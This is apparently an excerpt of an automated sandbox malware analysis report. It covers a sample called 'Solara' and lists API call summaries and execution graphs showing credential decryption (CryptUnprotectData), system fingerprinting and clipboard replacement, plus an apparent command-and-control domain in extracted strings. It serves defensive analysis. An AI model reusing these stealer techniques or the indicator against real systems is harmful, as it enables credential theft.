                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EncodePointer
                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                      • Opcode ID: 656a45af67f29a5a9a9e50a0deb4ca4d95213c570cd54a675bc8cb65ef85c833
                                                                                                                                      • Instruction ID: 0fa30f31161f47f40f510c627690f1230dc360bdd2dec2c5ed28d76b3d1338f5
                                                                                                                                      • Opcode Fuzzy Hash: 656a45af67f29a5a9a9e50a0deb4ca4d95213c570cd54a675bc8cb65ef85c833
                                                                                                                                      • Instruction Fuzzy Hash: 0641587291020AAFCF16DF94CD81AEEBBF5BF58300F188199FA14A7211D33599A1DF91
                                                                                                                                      APIs
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0021B475
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___except_validate_context_record
                                                                                                                                      • String ID: csm$csm
                                                                                                                                      • API String ID: 3493665558-3733052814
                                                                                                                                      • Opcode ID: e09243e6ae4c383fe7c87229b9dac2269f023e04d93da732cad78dec25c155db
                                                                                                                                      • Instruction ID: be8229ece32eb8eb03166fae194580bf0e8fc8b6924bbc3aee15c0993f5f4772
                                                                                                                                      • Opcode Fuzzy Hash: e09243e6ae4c383fe7c87229b9dac2269f023e04d93da732cad78dec25c155db
                                                                                                                                      • Instruction Fuzzy Hash: 6231C17642021AEBCF238F50C8449EA7BBBEB28314B58825AF84449122D332DDF1DBD1
                                                                                                                                      APIs
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0020B8B9
                                                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?), ref: 0020B8DE
                                                                                                                                        • Part of subcall function 0021060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0020F354,03294048,?,?,?,0020F354,00203D4A,0023759C,00203D4A), ref: 0021066D
                                                                                                                                        • Part of subcall function 00218353: IsProcessorFeaturePresent.KERNEL32(00000017,0021C224), ref: 0021836F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 1924019822-1018135373
                                                                                                                                      • Opcode ID: b227504648cf42480669164af529f3f27c00eb95dc4c646c405c6da9ba0dff4b
                                                                                                                                      • Instruction ID: d23a64481f0f8dd333442f91b3118aa201e4550dbd1a39fd43d75c652f076da9
                                                                                                                                      • Opcode Fuzzy Hash: b227504648cf42480669164af529f3f27c00eb95dc4c646c405c6da9ba0dff4b
                                                                                                                                      • Instruction Fuzzy Hash: 2F219031D1031DEBCF36DF95D849AEEB7B8AF54710F184409E505AB1A2CB70AD65CB81
                                                                                                                                      APIs
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00202673
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___std_exception_copy
                                                                                                                                      • String ID: bad array new length$ios_base::badbit set
                                                                                                                                      • API String ID: 2659868963-1158432155
                                                                                                                                      • Opcode ID: 039e89e7e4696f9a011fd7ec2f84907d9f7db77f3a15acda8e4200588bbb50d5
                                                                                                                                      • Instruction ID: aded9947e00df311e48c486714c02fcb1033ce9886c01ee909f178529cbbf44b
                                                                                                                                      • Opcode Fuzzy Hash: 039e89e7e4696f9a011fd7ec2f84907d9f7db77f3a15acda8e4200588bbb50d5
                                                                                                                                      • Instruction Fuzzy Hash: 3D01D4F1524305ABDB14DF28E856A5A7BE8AF18318F00881CF4599B351D376E968CB81
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0020F354,03294048,?,?,?,0020F354,00203D4A,0023759C,00203D4A), ref: 0021066D
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00202673
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                      • String ID: bad array new length$ios_base::badbit set
                                                                                                                                      • API String ID: 3109751735-1158432155
                                                                                                                                      • Opcode ID: 3a091ecabf108bb24c8a22d232eddc0bd30bd3e776c84db78c74645e5f6b1ddb
                                                                                                                                      • Instruction ID: 578e92895e6a201dae27cebb0ad3b06f97f9c027664929010d58e4ce635e6d75
                                                                                                                                      • Opcode Fuzzy Hash: 3a091ecabf108bb24c8a22d232eddc0bd30bd3e776c84db78c74645e5f6b1ddb
                                                                                                                                      • Instruction Fuzzy Hash: 22F0F8F1524310ABD700AF58E84A74BBBE8EB59718F01881CF598AB311D3B5D5A8CF92

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:4.3%
                                                                                                                                      Dynamic/Decrypted Code Coverage:7.2%
                                                                                                                                      Signature Coverage:42.6%
                                                                                                                                      Total number of Nodes:223
                                                                                                                                      Total number of Limit Nodes:20
                                                                                                                                      execution_graph 33963 40cc00 33967 409650 33963->33967 33965 40cc13 CoUninitialize 33966 40cc30 33965->33966 33968 409664 33967->33968 33968->33965 33777 43ecc0 33778 43ece0 33777->33778 33782 43ed1e 33778->33782 33785 43cb40 LdrInitializeThunk 33778->33785 33779 43ef3d 33781 43edff 33787 43b000 33781->33787 33782->33779 33782->33781 33786 43cb40 LdrInitializeThunk 33782->33786 33785->33782 33786->33781 33788 43b013 33787->33788 33789 43b015 33787->33789 33788->33779 33790 43b01a RtlFreeHeap 33789->33790 33790->33779 33969 436b86 33970 436bad 33969->33970 33971 436c04 33970->33971 33973 43cb40 LdrInitializeThunk 33970->33973 33973->33970 33791 42c344 33792 42c34d FreeLibrary 33791->33792 33794 42c36b 33792->33794 33794->33794 33795 42c452 GetComputerNameExA 33794->33795 33796 42c491 33795->33796 33796->33796 33797 4371ca 33798 4371e5 33797->33798 33799 4371f4 GetUserDefaultUILanguage 33798->33799 33800 43cd4f 33801 43cd63 GetForegroundWindow 33800->33801 33802 43cd6f 33801->33802 33974 431d0d 33975 431d10 33974->33975 33976 431c9e CoSetProxyBlanket 33974->33976 33976->33974 33803 425cd0 33804 425cf0 33803->33804 33807 425d4e 33804->33807 33811 43cb40 LdrInitializeThunk 33804->33811 33805 42613c 33807->33805 33809 425e4e 33807->33809 33812 43cb40 LdrInitializeThunk 33807->33812 33808 43b000 RtlFreeHeap 33808->33805 33809->33808 33811->33807 33812->33809 33813 43d250 33814 43d270 33813->33814 33816 43d2fe 33814->33816 33817 43cb40 LdrInitializeThunk 33814->33817 33817->33816 33818 43cad0 33819 43cb20 33818->33819 33820 43caf6 33818->33820 33821 43cb26 33818->33821 33822 43cae8 33818->33822 33825 43cb0a 33818->33825 33823 43b000 RtlFreeHeap 33819->33823 33827 43cafb RtlReAllocateHeap 33820->33827 33824 43b000 RtlFreeHeap 33821->33824 33822->33819 33822->33820 33822->33821 33822->33825 33823->33821 33826 43cb2f 33824->33826 33827->33825 33977 437a10 33978 437a35 33977->33978 33980 437b0a 33978->33980 33986 43cb40 LdrInitializeThunk 33978->33986 33982 437d26 33980->33982 33984 437c03 33980->33984 33985 43cb40 LdrInitializeThunk 33980->33985 33984->33982 33987 43cb40 LdrInitializeThunk 33984->33987 33985->33980 33986->33978 33987->33984 33988 417215 33990 417250 33988->33990 33989 4173e7 33990->33989 33990->33990 33991 43fbe0 LdrInitializeThunk 33990->33991 33991->33990 33992 433c95 33993 433c9a 33992->33993 33994 433cd0 GetSystemMetrics GetSystemMetrics 33993->33994 33995 433d0f 33994->33995 34001 42c498 34002 42c4a2 GetComputerNameExA 34001->34002 33828 51e1000 33829 51e1102 33828->33829 33830 51e1012 33828->33830 33831 51e103a OpenClipboard 33830->33831 33832 51e1030 Sleep 33830->33832 33833 51e104a GetClipboardData 33831->33833 33834 51e10f9 GetClipboardSequenceNumber 33831->33834 33832->33830 33835 51e105a GlobalLock 33833->33835 33836 51e10f3 CloseClipboard 33833->33836 33834->33830 33835->33836 33837 51e106b GlobalAlloc 33835->33837 33836->33834 33839 51e109d GlobalLock 33837->33839 33840 51e10e9 GlobalUnlock 33837->33840 33841 51e10b0 33839->33841 33840->33836 33842 51e10b9 GlobalUnlock 33841->33842 33843 51e10cb EmptyClipboard SetClipboardData 33842->33843 33844 51e10e0 GlobalFree 33842->33844 33843->33840 33843->33844 33844->33840 33845 433a5d 33846 433a74 33845->33846 33849 434180 33846->33849 33850 4341bd GetObjectW 33849->33850 33852 4342a5 33850->33852 34004 42bc22 34005 42bc2a 34004->34005 34006 42bcda GetPhysicallyInstalledSystemMemory 34005->34006 34007 42bd00 34006->34007 34007->34007 33853 43f560 33854 43f571 33853->33854 33857 43f68e 33854->33857 33861 43cb40 LdrInitializeThunk 33854->33861 33855 43f8c3 33857->33855 33859 43f7ce 33857->33859 33862 43cb40 LdrInitializeThunk 33857->33862 33858 43b000 RtlFreeHeap 33858->33855 33859->33858 33861->33857 33862->33859 33863 43afe0 RtlAllocateHeap 34008 43fe20 34009 43fe40 34008->34009 34009->34009 34011 43fe7e 34009->34011 34014 43cb40 LdrInitializeThunk 34009->34014 34012 43fefe 34011->34012 34015 43cb40 LdrInitializeThunk 34011->34015 34014->34011 34015->34012 33864 42fee7 CoSetProxyBlanket 33865 4150e9 33866 4150f0 33865->33866 33867 415192 CryptUnprotectData 33866->33867 33867->33866 33868 4152db 33867->33868 33868->33868 33874 42a8ec 33876 42a910 33874->33876 33875 42aa2e 33876->33875 33878 43cb40 LdrInitializeThunk 33876->33878 33878->33875 34016 40d0ae 34019 411bb0 34016->34019 34018 40d0b4 34027 411bc9 34019->34027 34020 411bd0 34020->34018 34022 413601 CreateThread 34022->34027 34023 43cb40 LdrInitializeThunk 34023->34027 34026 43b000 RtlFreeHeap 34026->34027 34027->34020 34027->34022 34027->34023 34027->34026 34028 40acd0 RtlFreeHeap RtlReAllocateHeap 34027->34028 34029 43f8e0 LdrInitializeThunk 34027->34029 34030 43ff50 LdrInitializeThunk 34027->34030 34028->34027 34029->34027 34030->34027 34031 408630 34033 40863f 34031->34033 34032 408941 ExitProcess 34033->34032 34034 408654 GetCurrentProcessId GetCurrentThreadId 34033->34034 34035 40892a 34033->34035 34036 408680 SHGetSpecialFolderPathW 34034->34036 34037 40867c 34034->34037 34038 408933 34035->34038 34040 4087d0 34036->34040 34037->34036 34047 43cab0 FreeLibrary 34038->34047 34041 408896 GetForegroundWindow 34040->34041 34042 4088b1 34041->34042 34042->34035 34046 40c630 CoInitializeEx 34042->34046 34047->34032 33879 41fdf0 33880 41fe50 33879->33880 33881 41fdfe 33879->33881 33885 41ff10 33881->33885 33883 41fecc 33883->33880 33884 41df20 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 33883->33884 33884->33880 33886 41ff20 33885->33886 33886->33886 33889 43fbe0 33886->33889 33888 42005f 33891 43fc00 33889->33891 33890 43fd1e 33890->33888 33891->33890 33893 43cb40 LdrInitializeThunk 33891->33893 33893->33890 33894 40c678 CoInitializeSecurity CoInitializeSecurity 34063 43d13b 34064 43cf1c 34063->34064 34065 43cb40 LdrInitializeThunk 34064->34065 34065->34064 34066 40d53a 34067 40d5c0 34066->34067 34068 40d60e 34067->34068 34072 43cb40 LdrInitializeThunk 34067->34072 34071 43cb40 LdrInitializeThunk 34068->34071 34071->34068 34072->34068 33895 40d97b 33896 40d9a0 33895->33896 33899 437d90 33896->33899 33898 40daaf 33898->33898 33900 437dc0 CoCreateInstance 33899->33900 33902 43832b 33900->33902 33903 437fac SysAllocString 33900->33903 33904 43833b GetVolumeInformationW 33902->33904 33906 43800e 33903->33906 33914 438355 33904->33914 33907 438016 CoSetProxyBlanket 33906->33907 33908 43831b SysFreeString 33906->33908 33909 438311 33907->33909 33910 438036 SysAllocString 33907->33910 33908->33902 33909->33908 33912 4380e0 33910->33912 33912->33912 33913 438105 SysAllocString 33912->33913 33917 438128 33913->33917 33914->33898 33915 4382fb SysFreeString SysFreeString 33915->33909 33916 4382f1 33916->33915 33917->33915 33917->33916 33918 43816c VariantInit 33917->33918 33920 4381c0 33918->33920 33919 4382e0 VariantClear 33919->33916 33920->33919 33921 42187f 33922 421896 33921->33922 33924 421922 33922->33924 33940 43cb40 LdrInitializeThunk 33922->33940 33923 4223e1 33929 422117 33924->33929 33930 4221de 33924->33930 33941 43cb40 LdrInitializeThunk 33924->33941 33926 422dd1 33928 420500 2 API calls 33926->33928 33927 422c97 33939 422ee1 33927->33939 33943 420500 33927->33943 33928->33939 33930->33923 33934 4225cd 33930->33934 33942 43cb40 LdrInitializeThunk 33930->33942 33934->33926 33934->33927 33934->33929 33934->33934 33935 43fbe0 LdrInitializeThunk 33934->33935 33937 422b21 33934->33937 33935->33937 33936 422c81 GetLogicalDrives 33938 43fbe0 LdrInitializeThunk 33936->33938 33937->33926 33937->33927 33937->33936 33937->33937 33937->33939 33938->33927 33940->33924 33941->33930 33942->33930 33955 43fa60 33943->33955 33945 420ceb 33945->33926 33946 420c78 33948 43b000 RtlFreeHeap 33946->33948 33950 420c88 33948->33950 33949 420543 33949->33945 33954 420601 33949->33954 33959 43cb40 LdrInitializeThunk 33949->33959 33950->33945 33961 43cb40 LdrInitializeThunk 33950->33961 33953 43b000 RtlFreeHeap 33953->33954 33954->33946 33954->33953 33960 43cb40 LdrInitializeThunk 33954->33960 33957 43fa80 33955->33957 33956 43fb8e 33956->33949 33957->33956 33962 43cb40 LdrInitializeThunk 33957->33962 33959->33949 33960->33954 33961->33950 33962->33956
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $ $ $!$!$"$#$#$#$$$$$$$%$&$($)$)$)$*$+$+$-$-$/$0$0$1$2$3$3$5$5$6$7$7$8$9$:$;$<$<$=$=$=$>$>$?$?$B$C$D$D$I$J$J$K$K$L$M$Q$Q$S$T$T$U$U$V$W$X$Y$]$`$`$b$g$g$i$j$k$m$m$o$o$o$q$y$z$|$}
                                                                                                                                      • API String ID: 0-1430558441
                                                                                                                                      • Opcode ID: 6f51afbb31542153ac17584bb8bd85ca6faf61b0594f2859baaa2283363762f8
                                                                                                                                      • Instruction ID: 3f7e876fdc4b4fc9326b2f1212b01c35d2faf1b9a29aaffe64d892ab0c1eb4ba
                                                                                                                                      • Opcode Fuzzy Hash: 6f51afbb31542153ac17584bb8bd85ca6faf61b0594f2859baaa2283363762f8
                                                                                                                                      • Instruction Fuzzy Hash: BF03DE3010C7C18AD3359B3885843EFBFE16B96324F188A6EE4E9873D2D6798586C757
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $9d7Z$CNF8$JOSP$MM$Q*RG$R03!$].n^$bOsq$b]g'$cgI$f1B$g}zh$iTUJ$mindhandru.buzz$nbh0$r$v(B$vG$wdnf$w$w<$y}$~SS}$$
                                                                                                                                      • API String ID: 0-2359571146
                                                                                                                                      • Opcode ID: c14e6c14acb301ad29bc5ab071e17f14ceb0fbe914c4cf5615b4e0e1d51bd8b8
                                                                                                                                      • Instruction ID: 46ddeba5fc4c2069f7caddc8e74ea65dff037b6c5529b8af0438bee76d3063f0
                                                                                                                                      • Opcode Fuzzy Hash: c14e6c14acb301ad29bc5ab071e17f14ceb0fbe914c4cf5615b4e0e1d51bd8b8
                                                                                                                                      • Instruction Fuzzy Hash: CFC21FB4608351CFD310CF28E89066BBBE1EF86354F58896CE5D58B3A2E778D905CB46

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 686 437d90-437db2 687 437dc0-437dd2 686->687 687->687 688 437dd4-437def 687->688 689 437df0-437e0a 688->689 689->689 690 437e0c-437e51 689->690 691 437e60-437e99 690->691 691->691 692 437e9b-437eb7 691->692 694 437f06-437f11 692->694 695 437eb9-437ecb 692->695 697 437f20-437f4d 694->697 696 437ed0-437ef6 695->696 696->696 698 437ef8-437f02 696->698 697->697 699 437f4f-437fa6 CoCreateInstance 697->699 698->694 700 43832b-438353 call 43e5d0 GetVolumeInformationW 699->700 701 437fac-437fdf 699->701 706 438355-438359 700->706 707 43835d-43835f 700->707 703 437fe0-437fe8 701->703 703->703 705 437fea-438010 SysAllocString 703->705 710 438016-438030 CoSetProxyBlanket 705->710 711 43831b-438327 SysFreeString 705->711 706->707 709 438387-438392 707->709 712 438394-43839b 709->712 713 43839e-4383bf 709->713 714 438311-438317 710->714 715 438036-438048 710->715 711->700 712->713 716 4383c0-438400 713->716 714->711 717 438050-438064 715->717 716->716 718 438402-438418 716->718 717->717 719 438066-4380df SysAllocString 717->719 720 438420-438432 718->720 721 4380e0-438103 719->721 720->720 722 438434-43845f call 41cbb0 720->722 721->721 723 438105-43812a SysAllocString 721->723 726 438460-438468 722->726 729 438130-438152 723->729 730 4382fb-43830d SysFreeString * 2 723->730 726->726 728 43846a-43846c 726->728 731 438472-438482 call 408040 728->731 732 438370-438381 728->732 737 4382f1-4382f7 729->737 738 438158-43815b 729->738 730->714 731->732 732->709 734 438487-43848e 732->734 737->730 738->737 739 438161-438166 738->739 739->737 740 43816c-4381bb VariantInit 739->740 741 4381c0-438200 740->741 741->741 742 438202-438218 741->742 743 43821c-438222 742->743 744 4382e0-4382ed VariantClear 743->744 745 438228-43822e 743->745 744->737 745->744 746 438234-438242 745->746 747 438244-438249 746->747 748 43827d 746->748 749 43825c-438260 747->749 750 43827f-4382ae call 407fb0 call 408e00 748->750 751 438262-43826b 749->751 752 438250 749->752 761 4382b0-4382ba 750->761 762 4382cf-4382dc call 407fc0 750->762 756 438272-438276 751->756 757 43826d-438270 751->757 755 438251-43825a 752->755 755->749 755->750 756->755 759 438278-43827b 756->759 757->755 759->755 761->762 763 4382bc-4382c6 761->763 762->744 763->762 765 4382c8-4382cb 763->765 765->762
                                                                                                                                      APIs
                                                                                                                                      • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C), ref: 00437F9E
                                                                                                                                      • SysAllocString.OLEAUT32(20FC2208), ref: 00437FEB
                                                                                                                                      • CoSetProxyBlanket.COMBASE(AF82451C,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438028
                                                                                                                                      • SysAllocString.OLEAUT32(20FC2208), ref: 00438067
                                                                                                                                      • SysAllocString.OLEAUT32(20FC2208), ref: 00438106
                                                                                                                                      • VariantInit.OLEAUT32(.' !), ref: 00438171
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                      • String ID: .' !$4f@$ANOL$C$Zed$v=
                                                                                                                                      • API String ID: 65563702-1035801111
                                                                                                                                      • Opcode ID: d71773d6f3cafd622f3dbd3df40cc56fd95c1ba38715fb482d384af8682c7497
                                                                                                                                      • Instruction ID: 1f56fd56f045259c52df17ff47771173478767a4a6340934a8b0b6d2fc839862
                                                                                                                                      • Opcode Fuzzy Hash: d71773d6f3cafd622f3dbd3df40cc56fd95c1ba38715fb482d384af8682c7497
                                                                                                                                      • Instruction Fuzzy Hash: FA02C9B1A083409BD310CF29C880B6BBBE1EFDA714F145A2DF591AB391D779D805CB5A

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(00000001), ref: 051E1032
                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 051E103C
                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 051E104C
                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 051E105D
                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 051E1090
                                                                                                                                      • GlobalLock.KERNEL32 ref: 051E10A0
                                                                                                                                      • GlobalUnlock.KERNEL32 ref: 051E10C1
                                                                                                                                      • EmptyClipboard.USER32 ref: 051E10CB
                                                                                                                                      • SetClipboardData.USER32(0000000D), ref: 051E10D6
                                                                                                                                      • GlobalFree.KERNEL32 ref: 051E10E3
                                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 051E10ED
                                                                                                                                      • CloseClipboard.USER32 ref: 051E10F3
                                                                                                                                      • GetClipboardSequenceNumber.USER32 ref: 051E10F9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2898514560.00000000051E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2898500410.00000000051E0000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2898528691.00000000051E2000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_51e0000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1416286485-0
                                                                                                                                      • Opcode ID: 1020293ed6e5f689a881c03ee85df483d90b86a9dc8055a4f539a1b7f1b33e82
                                                                                                                                      • Instruction ID: ac20cf259bb3ed65adfb4db930ef9b393faa1d9273e4a372e2727d5ad4ac4d65
                                                                                                                                      • Opcode Fuzzy Hash: 1020293ed6e5f689a881c03ee85df483d90b86a9dc8055a4f539a1b7f1b33e82
                                                                                                                                      • Instruction Fuzzy Hash: F2218879654650ABE7212BF19C0EF6A7BACFF08751F050428F956DA191EF718C80CF61

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 789 422672-422682 790 422843 789->790 791 422600-42260e 789->791 792 4226e1 789->792 793 422861-422873 789->793 794 4226a4-4226d8 789->794 795 4229a4 789->795 796 422a04-422a0a 789->796 797 422845-42284c 789->797 798 422a25-422a2b call 407fc0 789->798 799 422829-42283c 789->799 800 422a2e-422a3a 789->800 801 4226f0-422717 789->801 802 422810-422822 789->802 803 422a11-422a16 789->803 804 422855-42285f 789->804 805 422a3b-422a44 789->805 806 422a1d 789->806 790->797 791->799 807 422650-422658 791->807 808 422647 791->808 809 422615-422640 791->809 810 4227da-4227e6 791->810 811 4227ed-422805 791->811 812 422719-422726 792->812 834 422876-422880 793->834 794->792 825 4229e5-4229fe call 407fb0 795->825 813 4229e0 796->813 814 422a0c-422a0f 796->814 797->804 798->800 799->790 799->793 799->795 799->796 799->797 799->798 799->800 799->803 799->804 799->805 799->806 819 422b34-422b3b 799->819 801->812 802->790 802->793 802->795 802->796 802->797 802->798 802->799 802->800 802->803 802->804 802->805 802->806 802->819 803->798 803->800 803->805 803->806 815 422cc0 803->815 816 422de0-422e8f 803->816 817 422cc6-422d74 803->817 818 422b44-422b4d 803->818 803->819 804->834 821 422a46-422a4b 805->821 822 422a4d 805->822 806->798 807->789 808->807 809->807 809->808 810->799 810->807 810->808 810->811 811->790 811->793 811->795 811->796 811->797 811->798 811->799 811->800 811->802 811->803 811->804 811->805 811->806 811->819 829 422730-422759 812->829 813->825 814->825 815->817 823 422e90-422ec6 816->823 832 422d80-422db6 817->832 826 422b56 818->826 827 422b4f-422b54 818->827 819->818 828 422a54-422a8b call 407fb0 821->828 822->828 823->823 835 422ec8-422ee4 call 420500 823->835 825->796 837 422b5d-422c01 call 407fb0 826->837 827->837 850 422a90-422ab6 828->850 829->829 838 42275b-422763 829->838 832->832 840 422db8-422dd4 call 420500 